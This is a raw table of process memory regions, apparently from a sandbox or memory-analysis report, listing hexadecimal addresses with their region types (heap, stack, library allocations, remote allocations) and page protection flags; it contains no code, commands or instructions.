||
227062C0000
|
heap
|
page read and write
|
||
22265AAE000
|
heap
|
page read and write
|
||
2271FC60000
|
trusted library allocation
|
page read and write
|
||
14C3000
|
heap
|
page read and write
|
||
22723FA0000
|
heap
|
page read and write
|
||
22265380000
|
heap
|
page read and write
|
||
1E584E30000
|
trusted library allocation
|
page read and write
|
||
2226537A000
|
heap
|
page read and write
|
||
22265A61000
|
heap
|
page read and write
|
||
7FC000
|
heap
|
page read and write
|
||
1BDDD000
|
heap
|
page read and write
|
||
1243F000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
22265354000
|
heap
|
page read and write
|
||
22265352000
|
heap
|
page read and write
|
||
843000
|
unkown
|
page readonly
|
||
24D4000
|
unkown
|
page readonly
|
||
668B47B000
|
stack
|
page read and write
|
||
1E580CA1000
|
trusted library allocation
|
page read and write
|
||
1BC1C000
|
heap
|
page read and write
|
||
22708180000
|
trusted library allocation
|
page read and write
|
||
22720588000
|
heap
|
page read and write
|
||
22265B3C000
|
heap
|
page read and write
|
||
BCD000
|
unkown
|
page readonly
|
||
1C3BE000
|
stack
|
page read and write
|
||
22265391000
|
heap
|
page read and write
|
||
85852FE000
|
unkown
|
page readonly
|
||
5E0000
|
heap
|
page read and write
|
||
506D000
|
stack
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
3D0F000
|
stack
|
page read and write
|
||
22707F43000
|
trusted library allocation
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
7FF849194000
|
trusted library allocation
|
page read and write
|
||
1C5CAC00000
|
unkown
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
1220000
|
heap
|
page read and write
|
||
22705F84000
|
heap
|
page read and write
|
||
3270000
|
unkown
|
page readonly
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
1E580002000
|
heap
|
page read and write
|
||
BA0000
|
trusted library allocation
|
page execute and read and write
|
||
22264A8F000
|
heap
|
page read and write
|
||
1C0C0000
|
heap
|
page execute and read and write
|
||
8B0000
|
heap
|
page read and write
|
||
1E5850D5000
|
heap
|
page read and write
|
||
381000
|
stack
|
page read and write
|
||
BD4000
|
unkown
|
page read and write
|
||
22265AA4000
|
heap
|
page read and write
|
||
1845000
|
heap
|
page read and write
|
||
22264B3B000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
B47000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
129F000
|
trusted library allocation
|
page read and write
|
||
2530000
|
heap
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
2666000
|
trusted library allocation
|
page read and write
|
||
22265AD1000
|
heap
|
page read and write
|
||
22708101000
|
trusted library allocation
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
22707CED000
|
trusted library allocation
|
page read and write
|
||
12400000
|
trusted library allocation
|
page read and write
|
||
2272408C000
|
heap
|
page read and write
|
||
1E584D50000
|
trusted library allocation
|
page read and write
|
||
1852000
|
unkown
|
page readonly
|
||
22721B95000
|
heap
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
668C0FB000
|
stack
|
page read and write
|
||
1E584D40000
|
trusted library allocation
|
page read and write
|
||
1404B043000
|
heap
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
22265200000
|
heap
|
page read and write
|
||
33CE000
|
stack
|
page read and write
|
||
585D19E000
|
stack
|
page read and write
|
||
227082E0000
|
trusted library allocation
|
page read and write
|
||
1E584EA0000
|
trusted library allocation
|
page read and write
|
||
22707C10000
|
trusted library section
|
page readonly
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
22265ACB000
|
heap
|
page read and write
|
||
22265332000
|
heap
|
page read and write
|
||
4BEE000
|
stack
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
1BC23000
|
heap
|
page read and write
|
||
227081BA000
|
trusted library allocation
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page execute and read and write
|
||
1E580770000
|
trusted library section
|
page readonly
|
||
7E2000
|
heap
|
page read and write
|
||
139B000
|
trusted library allocation
|
page read and write
|
||
1B0C0000
|
heap
|
page execute and read and write
|
||
1430000
|
heap
|
page read and write
|
||
22265ADA000
|
heap
|
page read and write
|
||
22265AC3000
|
heap
|
page read and write
|
||
22707CE7000
|
trusted library allocation
|
page read and write
|
||
1B2D5000
|
heap
|
page read and write
|
||
858497E000
|
stack
|
page read and write
|
||
1E58011A000
|
heap
|
page read and write
|
||
22265215000
|
heap
|
page read and write
|
||
7FF848FC7000
|
trusted library allocation
|
page read and write
|
||
AAA72F9000
|
stack
|
page read and write
|
||
1C5CB002000
|
heap
|
page read and write
|
||
1C5CAC78000
|
heap
|
page read and write
|
||
22264A99000
|
heap
|
page read and write
|
||
22264B1A000
|
heap
|
page read and write
|
||
1240000
|
heap
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
1BC8C000
|
heap
|
page read and write
|
||
3A20000
|
unkown
|
page readonly
|
||
22264B3C000
|
heap
|
page read and write
|
||
22721CEF000
|
heap
|
page read and write
|
||
3781000
|
trusted library allocation
|
page read and write
|
||
4E30000
|
heap
|
page read and write
|
||
1E584DD3000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
143C000
|
trusted library allocation
|
page read and write
|
||
4020000
|
trusted library allocation
|
page execute and read and write
|
||
1E584DA0000
|
trusted library allocation
|
page read and write
|
||
1586000
|
trusted library allocation
|
page read and write
|
||
22265357000
|
heap
|
page read and write
|
||
22265A79000
|
heap
|
page read and write
|
||
22705F3D000
|
heap
|
page read and write
|
||
22265AD1000
|
heap
|
page read and write
|
||
22720780000
|
heap
|
page read and write
|
||
1E57F895000
|
heap
|
page read and write
|
||
227204B0000
|
heap
|
page read and write
|
||
1E584CD0000
|
trusted library allocation
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
2226535B000
|
heap
|
page read and write
|
||
22265356000
|
heap
|
page read and write
|
||
91F000
|
stack
|
page read and write
|
||
22721C65000
|
heap
|
page read and write
|
||
22265354000
|
heap
|
page read and write
|
||
12B9000
|
heap
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page execute and read and write
|
||
22265ABF000
|
heap
|
page read and write
|
||
7FF848FCD000
|
trusted library allocation
|
page read and write
|
||
7FF849093000
|
trusted library allocation
|
page read and write
|
||
6A8000
|
heap
|
page read and write
|
||
22721BB8000
|
heap
|
page read and write
|
||
22265B1B000
|
heap
|
page read and write
|
||
22705FBF000
|
heap
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
227082CC000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
227081F6000
|
trusted library allocation
|
page read and write
|
||
1590000
|
heap
|
page read and write
|
||
227204B9000
|
heap
|
page read and write
|
||
1E580780000
|
trusted library section
|
page readonly
|
||
13311000
|
trusted library allocation
|
page read and write
|
||
1BAAF000
|
stack
|
page read and write
|
||
B06000
|
trusted library allocation
|
page execute and read and write
|
||
23F1000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
37A0000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
22705F43000
|
heap
|
page read and write
|
||
52BD000
|
stack
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
B17000
|
trusted library allocation
|
page execute and read and write
|
||
130E000
|
heap
|
page read and write
|
||
1E585110000
|
heap
|
page read and write
|
||
22265AB8000
|
heap
|
page read and write
|
||
2270845D000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
1404B000000
|
heap
|
page read and write
|
||
D5C000
|
heap
|
page read and write
|
||
890000
|
heap
|
page read and write
|
||
22717D8F000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
3FD0000
|
trusted library allocation
|
page read and write
|
||
22265ACF000
|
heap
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
831000
|
unkown
|
page execute read
|
||
222E000
|
trusted library allocation
|
page read and write
|
||
22720755000
|
heap
|
page read and write
|
||
AC0000
|
heap
|
page execute and read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
1B2A0000
|
trusted library section
|
page read and write
|
||
1E584D80000
|
trusted library allocation
|
page read and write
|
||
1E57F800000
|
heap
|
page read and write
|
||
227078E1000
|
heap
|
page read and write
|
||
7FF8491C0000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
trusted library allocation
|
page execute and read and write
|
||
B3D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
1C5CB013000
|
heap
|
page read and write
|
||
22264B3C000
|
heap
|
page read and write
|
||
85846FE000
|
unkown
|
page readonly
|
||
1C310000
|
unkown
|
page readonly
|
||
56A0000
|
heap
|
page read and write
|
||
2226535A000
|
heap
|
page read and write
|
||
7FF848E3A000
|
trusted library allocation
|
page read and write
|
||
22722062000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
8584EFE000
|
unkown
|
page readonly
|
||
14EB000
|
heap
|
page read and write
|
||
1BDD0000
|
heap
|
page read and write
|
||
24F0000
|
trusted library allocation
|
page read and write
|
||
22264B1B000
|
heap
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
22264AAD000
|
heap
|
page read and write
|
||
1A72A7E000
|
stack
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
22721B55000
|
heap
|
page read and write
|
||
AD0000
|
heap
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
1B1F5000
|
heap
|
page read and write
|
||
22264B3C000
|
heap
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
237E000
|
stack
|
page read and write
|
||
578000
|
stack
|
page read and write
|
||
2390000
|
heap
|
page execute and read and write
|
||
B0A000
|
trusted library allocation
|
page execute and read and write
|
||
AAA6F7E000
|
stack
|
page read and write
|
||
1BC86000
|
heap
|
page read and write
|
||
1E58510E000
|
heap
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
B65000
|
trusted library allocation
|
page execute and read and write
|
||
22264B3F000
|
heap
|
page read and write
|
||
2513000
|
trusted library allocation
|
page read and write
|
||
2480000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
1AD40000
|
heap
|
page read and write
|
||
132FC000
|
trusted library allocation
|
page read and write
|
||
3C0E000
|
stack
|
page read and write
|
||
7FF848FD3000
|
trusted library allocation
|
page read and write
|
||
1BF47000
|
heap
|
page read and write
|
||
22264B3C000
|
heap
|
page read and write
|
||
3D0000
|
heap
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
22264A99000
|
heap
|
page read and write
|
||
22707B63000
|
heap
|
page execute and read and write
|
||
668BEFB000
|
stack
|
page read and write
|
||
2226535D000
|
heap
|
page read and write
|
||
56E000
|
stack
|
page read and write
|
||
2226537F000
|
heap
|
page read and write
|
||
7FF84903E000
|
trusted library allocation
|
page read and write
|
||
14CE000
|
heap
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
14E4000
|
heap
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
222651A0000
|
remote allocation
|
page read and write
|
||
7FF849001000
|
trusted library allocation
|
page read and write
|
||
1C5CAC13000
|
unkown
|
page read and write
|
||
1B04E000
|
stack
|
page read and write
|
||
22717C61000
|
trusted library allocation
|
page read and write
|
||
22265378000
|
heap
|
page read and write
|
||
22264A8A000
|
heap
|
page read and write
|
||
22265AD7000
|
heap
|
page read and write
|
||
1946000
|
heap
|
page read and write
|
||
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
BC0000
|
unkown
|
page readonly
|
||
12CB000
|
heap
|
page read and write
|
||
22264B40000
|
heap
|
page read and write
|
||
22265393000
|
heap
|
page read and write
|
||
1E57F88C000
|
heap
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
22708353000
|
trusted library allocation
|
page read and write
|
||
22705F3B000
|
heap
|
page read and write
|
||
830000
|
unkown
|
page readonly
|
||
22265379000
|
heap
|
page read and write
|
||
2226537A000
|
heap
|
page read and write
|
||
2270806A000
|
trusted library allocation
|
page read and write
|
||
7FF84905E000
|
trusted library allocation
|
page read and write
|
||
1E57F780000
|
heap
|
page read and write
|
||
1E58504E000
|
heap
|
page read and write
|
||
2226532C000
|
heap
|
page read and write
|
||
22264A8E000
|
heap
|
page read and write
|
||
1404B026000
|
heap
|
page read and write
|
||
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
B4D000
|
trusted library allocation
|
page execute and read and write
|
||
349D000
|
trusted library allocation
|
page read and write
|
||
22707F3B000
|
trusted library allocation
|
page read and write
|
||
22264AA7000
|
heap
|
page read and write
|
||
1C7B0000
|
heap
|
page read and write
|
||
22264B3C000
|
heap
|
page read and write
|
||
85844FE000
|
unkown
|
page readonly
|
||
1BE3E000
|
heap
|
page read and write
|
||
7DE000
|
heap
|
page read and write
|
||
22264B1B000
|
heap
|
page read and write
|
||
1E57F8A0000
|
heap
|
page read and write
|
||
184E000
|
heap
|
page read and write
|
||
1C5CAB40000
|
heap
|
page read and write
|
||
314E000
|
stack
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
1E5850F1000
|
heap
|
page read and write
|
||
585E4FD000
|
stack
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
B12000
|
trusted library allocation
|
page read and write
|
||
22265329000
|
heap
|
page read and write
|
||
770000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
668B7F9000
|
stack
|
page read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
1BE4C000
|
heap
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
7FF848E3B000
|
trusted library allocation
|
page execute and read and write
|
||
1E5850ED000
|
heap
|
page read and write
|
||
823000
|
heap
|
page read and write
|
||
22707B60000
|
heap
|
page execute and read and write
|
||
1420000
|
heap
|
page read and write
|
||
123F1000
|
trusted library allocation
|
page read and write
|
||
22265A32000
|
heap
|
page read and write
|
||
1E584D90000
|
trusted library allocation
|
page read and write
|
||
22264A8E000
|
heap
|
page read and write
|
||
22264B1B000
|
heap
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
2226535A000
|
heap
|
page read and write
|
||
668C7FB000
|
stack
|
page read and write
|
||
1410000
|
heap
|
page read and write
|
||
7FF849037000
|
trusted library allocation
|
page read and write
|
||
1BE3C000
|
heap
|
page read and write
|
||
22265B02000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
4160000
|
trusted library allocation
|
page read and write
|
||
1E580760000
|
trusted library section
|
page readonly
|
||
22265385000
|
heap
|
page read and write
|
||
BCD000
|
unkown
|
page readonly
|
||
B62000
|
trusted library allocation
|
page read and write
|
||
22265354000
|
heap
|
page read and write
|
||
2226536B000
|
heap
|
page read and write
|
||
2DCE000
|
stack
|
page read and write
|
||
32EF000
|
stack
|
page read and write
|
||
156C000
|
heap
|
page read and write
|
||
1E5850D6000
|
heap
|
page read and write
|
||
3A00000
|
trusted library allocation
|
page read and write
|
||
22264A81000
|
heap
|
page read and write
|
||
24E0000
|
heap
|
page execute and read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
1BE4E000
|
heap
|
page read and write
|
||
1E580880000
|
trusted library allocation
|
page read and write
|
||
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
585D7FE000
|
stack
|
page read and write
|
||
22706040000
|
heap
|
page read and write
|
||
132FE000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
22265363000
|
heap
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
1BD000
|
stack
|
page read and write
|
||
585D15F000
|
stack
|
page read and write
|
||
22265A00000
|
heap
|
page read and write
|
||
22721BE8000
|
heap
|
page read and write
|
||
10AE000
|
stack
|
page read and write
|
||
22265332000
|
heap
|
page read and write
|
||
2270800C000
|
trusted library allocation
|
page read and write
|
||
585D8FB000
|
stack
|
page read and write
|
||
1C5CAD02000
|
trusted library allocation
|
page read and write
|
||
7FF848E4B000
|
trusted library allocation
|
page execute and read and write
|
||
14E7000
|
heap
|
page read and write
|
||
1BF3F000
|
stack
|
page read and write
|
||
152B000
|
heap
|
page read and write
|
||
1592000
|
heap
|
page read and write
|
||
CBE000
|
stack
|
page read and write
|
||
99E000
|
stack
|
page read and write
|
||
22707CF9000
|
trusted library allocation
|
page read and write
|
||
1577000
|
heap
|
page read and write
|
||
668BBFE000
|
unkown
|
page readonly
|
||
12411000
|
trusted library allocation
|
page read and write
|
||
22721B77000
|
heap
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
22265378000
|
heap
|
page read and write
|
||
22265329000
|
heap
|
page read and write
|
||
2272079B000
|
heap
|
page read and write
|
||
47C000
|
stack
|
page read and write
|
||
7A8000
|
heap
|
page read and write
|
||
227204E4000
|
heap
|
page read and write
|
||
22265B3C000
|
heap
|
page read and write
|
||
841000
|
unkown
|
page read and write
|
||
22265ADE000
|
heap
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
12D6000
|
heap
|
page read and write
|
||
63D000
|
heap
|
page read and write
|
||
1C5CAD15000
|
trusted library allocation
|
page read and write
|
||
1E580750000
|
trusted library section
|
page readonly
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
3F90000
|
trusted library allocation
|
page read and write
|
||
157E000
|
stack
|
page read and write
|
||
2226537B000
|
heap
|
page read and write
|
||
2226532A000
|
heap
|
page read and write
|
||
22721B00000
|
heap
|
page read and write
|
||
4000000
|
trusted library allocation
|
page read and write
|
||
157A000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
1E584EC0000
|
trusted library allocation
|
page read and write
|
||
1C5CAD00000
|
trusted library allocation
|
page read and write
|
||
32F1000
|
trusted library allocation
|
page read and write
|
||
3D4E000
|
stack
|
page read and write
|
||
227082D4000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
1C7C4000
|
heap
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
D1C000
|
heap
|
page read and write
|
||
22264B3C000
|
heap
|
page read and write
|
||
4D2E000
|
stack
|
page read and write
|
||
668C3FE000
|
unkown
|
page readonly
|
||
520000
|
heap
|
page read and write
|
||
22720950000
|
heap
|
page read and write
|
||
828000
|
heap
|
page read and write
|
||
1E584D90000
|
trusted library allocation
|
page read and write
|
||
12F8000
|
heap
|
page read and write
|
||
3E8E000
|
stack
|
page read and write
|
||
22265AB9000
|
heap
|
page read and write
|
||
3750000
|
trusted library allocation
|
page read and write
|
||
2270802E000
|
trusted library allocation
|
page read and write
|
||
176F000
|
stack
|
page read and write
|
||
3FB0000
|
trusted library allocation
|
page read and write
|
||
1E58502C000
|
heap
|
page read and write
|
||
1A720FB000
|
stack
|
page read and write
|
||
37AB000
|
trusted library allocation
|
page read and write
|
||
85858FE000
|
unkown
|
page readonly
|
||
B34000
|
trusted library allocation
|
page read and write
|
||
3781000
|
trusted library allocation
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
22721960000
|
heap
|
page read and write
|
||
CCA000
|
heap
|
page read and write
|
||
14F1000
|
heap
|
page read and write
|
||
22265B3C000
|
heap
|
page read and write
|
||
22721CE5000
|
heap
|
page read and write
|
||
830000
|
unkown
|
page readonly
|
||
14D6000
|
heap
|
page read and write
|
||
4010000
|
trusted library allocation
|
page read and write
|
||
841000
|
unkown
|
page write copy
|
||
7FF8491BA000
|
trusted library allocation
|
page read and write
|
||
22265A86000
|
heap
|
page read and write
|
||
1E580790000
|
trusted library section
|
page readonly
|
||
227207D0000
|
heap
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
22265378000
|
heap
|
page read and write
|
||
22721BC7000
|
heap
|
page read and write
|
||
22265378000
|
heap
|
page read and write
|
||
2226535C000
|
heap
|
page read and write
|
||
227240A9000
|
heap
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
227081D8000
|
trusted library allocation
|
page read and write
|
||
22265B14000
|
heap
|
page read and write
|
||
22721B80000
|
heap
|
page read and write
|
||
22265ACB000
|
heap
|
page read and write
|
||
39F0000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page execute and read and write
|
||
22706000000
|
heap
|
page read and write
|
||
22707F47000
|
trusted library allocation
|
page read and write
|
||
13300000
|
trusted library allocation
|
page read and write
|
||
7FF848FA3000
|
trusted library allocation
|
page read and write
|
||
22265395000
|
heap
|
page read and write
|
||
22264B1B000
|
heap
|
page read and write
|
||
222649A0000
|
heap
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
22264AAD000
|
heap
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
1C5CB100000
|
heap
|
page read and write
|
||
1B219000
|
heap
|
page read and write
|
||
7C6000
|
heap
|
page read and write
|
||
1C312000
|
unkown
|
page readonly
|
||
990000
|
heap
|
page read and write
|
||
22265A04000
|
heap
|
page read and write
|
||
60B000
|
heap
|
page read and write
|
||
2271FC90000
|
trusted library allocation
|
page read and write
|
||
1BC15000
|
heap
|
page read and write
|
||
133BF000
|
trusted library allocation
|
page read and write
|
||
22264A7D000
|
heap
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
1E57F85B000
|
heap
|
page read and write
|
||
C3E000
|
stack
|
page read and write
|
||
22264B1B000
|
heap
|
page read and write
|
||
252D000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
1E584EB0000
|
trusted library allocation
|
page read and write
|
||
77A000
|
heap
|
page read and write
|
||
21F7000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
7FF848FC5000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
85842FE000
|
unkown
|
page readonly
|
||
1BF4A000
|
heap
|
page read and write
|
||
516A000
|
stack
|
page read and write
|
||
2272054E000
|
heap
|
page read and write
|
||
3100000
|
trusted library section
|
page read and write
|
||
22721BBB000
|
heap
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
1AE4E000
|
stack
|
page read and write
|
||
7FF8491B0000
|
trusted library allocation
|
page read and write
|
||
1B87D000
|
stack
|
page read and write
|
||
1E585000000
|
heap
|
page read and write
|
||
FE0000
|
heap
|
page read and write
|
||
147E000
|
stack
|
page read and write
|
||
7FF8491C0000
|
trusted library allocation
|
page read and write
|
||
22265ADD000
|
heap
|
page read and write
|
||
BD6000
|
unkown
|
page readonly
|
||
1BBDA000
|
heap
|
page read and write
|
||
1BC2F000
|
heap
|
page read and write
|
||
8584B7E000
|
stack
|
page read and write
|
||
22706020000
|
heap
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
22265380000
|
heap
|
page read and write
|
||
2510000
|
trusted library allocation
|
page read and write
|
||
22708452000
|
trusted library allocation
|
page read and write
|
||
B1B000
|
trusted library allocation
|
page execute and read and write
|
||
22707A60000
|
heap
|
page read and write
|
||
21F1000
|
trusted library allocation
|
page read and write
|
||
222649D0000
|
trusted library allocation
|
page read and write
|
||
22265ADA000
|
heap
|
page read and write
|
||
85845FE000
|
unkown
|
page readonly
|
||
1E585102000
|
heap
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
7FF849083000
|
trusted library allocation
|
page read and write
|
||
22264B13000
|
heap
|
page read and write
|
||
22265A0A000
|
heap
|
page read and write
|
||
1440000
|
heap
|
page read and write
|
||
22723FB5000
|
heap
|
page read and write
|
||
1E57F7A0000
|
heap
|
page read and write
|
||
22265180000
|
remote allocation
|
page read and write
|
||
22705F00000
|
heap
|
page read and write
|
||
22717F42000
|
trusted library allocation
|
page read and write
|
||
22705E10000
|
heap
|
page read and write
|
||
22264A27000
|
heap
|
page read and write
|
||
22265AFB000
|
heap
|
page read and write
|
||
24C2000
|
unkown
|
page readonly
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
22265357000
|
heap
|
page read and write
|
||
222651A0000
|
remote allocation
|
page read and write
|
||
51BE000
|
stack
|
page read and write
|
||
22265340000
|
heap
|
page read and write
|
||
85843FB000
|
stack
|
page read and write
|
||
B20000
|
trusted library allocation
|
page read and write
|
||
1BE46000
|
heap
|
page read and write
|
||
668BFFE000
|
unkown
|
page readonly
|
||
746000
|
heap
|
page read and write
|
||
83B000
|
unkown
|
page readonly
|
||
1E58500F000
|
heap
|
page read and write
|
||
B50000
|
trusted library allocation
|
page read and write
|
||
1E580102000
|
heap
|
page read and write
|
||
22265352000
|
heap
|
page read and write
|
||
22265B00000
|
heap
|
page read and write
|
||
22264B1B000
|
heap
|
page read and write
|
||
7FF849137000
|
trusted library allocation
|
page read and write
|
||
BC1000
|
unkown
|
page execute read
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
22264B3C000
|
heap
|
page read and write
|
||
2226535A000
|
heap
|
page read and write
|
||
CD8000
|
stack
|
page read and write
|
||
71C000
|
heap
|
page read and write
|
||
1E58510A000
|
heap
|
page read and write
|
||
1E57F82B000
|
heap
|
page read and write
|
||
22708125000
|
trusted library allocation
|
page read and write
|
||
22265395000
|
heap
|
page read and write
|
||
22264B1B000
|
heap
|
page read and write
|
||
1E580301000
|
trusted library allocation
|
page read and write
|
||
7FF848FC8000
|
trusted library allocation
|
page read and write
|
||
22265374000
|
heap
|
page read and write
|
||
1BC79000
|
heap
|
page read and write
|
||
22721987000
|
heap
|
page read and write
|
||
8584DFE000
|
stack
|
page read and write
|
||
1BD70000
|
heap
|
page read and write
|
||
7FF848FD7000
|
trusted library allocation
|
page read and write
|
||
1E584DA0000
|
trusted library allocation
|
page read and write
|
||
22265B2C000
|
heap
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
9D3000
|
trusted library allocation
|
page execute and read and write
|
||
1C0D0000
|
unkown
|
page readonly
|
||
1404B002000
|
heap
|
page read and write
|
||
2270816E000
|
trusted library allocation
|
page read and write
|
||
F91000
|
stack
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
1BF40000
|
heap
|
page read and write
|
||
1E585041000
|
heap
|
page read and write
|
||
3FE0000
|
trusted library allocation
|
page read and write
|
||
22265A06000
|
heap
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
3940000
|
trusted library allocation
|
page read and write
|
||
783000
|
trusted library allocation
|
page read and write
|
||
1E584D61000
|
trusted library allocation
|
page read and write
|
||
22264AF7000
|
heap
|
page read and write
|
||
2E40000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
22265380000
|
heap
|
page read and write
|
||
377E000
|
trusted library allocation
|
page read and write
|
||
1590000
|
trusted library allocation
|
page read and write
|
||
825000
|
heap
|
page read and write
|
||
668C5FE000
|
unkown
|
page readonly
|
||
BB0000
|
trusted library allocation
|
page read and write
|
||
1E57F878000
|
heap
|
page read and write
|
||
22265AB3000
|
heap
|
page read and write
|
||
22706290000
|
trusted library allocation
|
page read and write
|
||
7FF8490A9000
|
trusted library allocation
|
page read and write
|
||
1BD7C000
|
heap
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
22707F97000
|
trusted library allocation
|
page read and write
|
||
1E57F813000
|
heap
|
page read and write
|
||
1BBD0000
|
heap
|
page read and write
|
||
17C0000
|
heap
|
page read and write
|
||
1C5CB102000
|
heap
|
page read and write
|
||
7DB000
|
heap
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
22720552000
|
heap
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page execute and read and write
|
||
22265357000
|
heap
|
page read and write
|
||
1E584D60000
|
trusted library allocation
|
page read and write
|
||
7FF84904E000
|
trusted library allocation
|
page read and write
|
||
2272053E000
|
heap
|
page read and write
|
||
15AF000
|
stack
|
page read and write
|
||
7E8000
|
heap
|
page read and write
|
||
222651A0000
|
remote allocation
|
